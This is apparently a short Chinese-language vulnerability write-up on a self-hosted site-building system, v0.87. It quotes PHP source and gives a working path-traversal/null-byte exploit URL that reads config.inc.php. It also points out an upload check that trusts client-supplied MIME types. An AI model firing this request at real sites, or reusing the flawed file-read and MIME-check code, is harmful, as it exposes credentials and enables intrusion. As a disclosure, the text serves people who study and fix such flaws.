行业之星自助建站系统v0.87漏洞
//template_edit.php
function load_library($curr_template, $lib_name)
{
$lib_name = str_replace("0xa", '', $lib_name); // 过滤0xa 非法字符
if($lib_name == 'style')
{
$lib_file = '../templates/user_themes/' . $curr_template . '/'.$lib_name.'.css';
}
else
{
$lib_file = '../templates/user_themes/' . $curr_template . '/'.$lib_name.'.html';
}
$arr['html'] = str_replace("\xEF\xBB\xBF", '', file_get_contents($lib_file));
return $arr;
}
严格说不应该算是包含。只是获取。条件如下:
if(!$Aconf['user_template'])
{
$strMessage = "启用自定义模板后才能操作,<A HREF=\"sysconfig.php\">系统管理->系统属性设置</A>->启用自定义模板【是】";
echo '<SCRIPT language="javascript"> alert( "'.$strMessage.'");</script>';
echo showMessage($strMessage);
exit;
}
利用方法:
http://www.iick.blog/admin/template_edit.php?template_file=/../../../config.inc.php%00
// cls_image.php
// 部分代码
var $error_no = 0;
var $error_msg = '';
var $images_dir = 'images';
var $data_dir = 'data';
var $bgcolor = '';
var $type_maping = array(1 => 'image/gif', 2 => 'image/jpeg', 3 => 'image/png',4 =>'text/plain',5 => 'application/x-zip-compressed',6 => 'image/pjpeg',7=>'application/octet-stream',8=>'image/x-png',9=> 'application/msword');
//略
function check_file_type($img_type) {
return $img_type == 'image/pjpeg' ||
$img_type == 'image/x-png' ||
$img_type == 'image/png' ||
$img_type == 'image/gif' ||
$img_type == 'image/jpeg' ||
$img_type == 'text/plain' ||
$img_type == 'application/x-zip-compressed' ||
$img_type == 'application/x-shockwave-flash' ||
$img_type == 'application/octet-stream' ||
$img_type == 'application/msword';
}
function check_img_type($img_type)
{
return $img_type == 'image/pjpeg' ||
$img_type == 'image/x-png' ||
$img_type == 'image/png' ||
$img_type == 'image/gif' ||
$img_type == 'application/x-shockwave-flash' ||
$img_type == 'image/jpeg' ;
}
//略
这种验证不太好吧。。。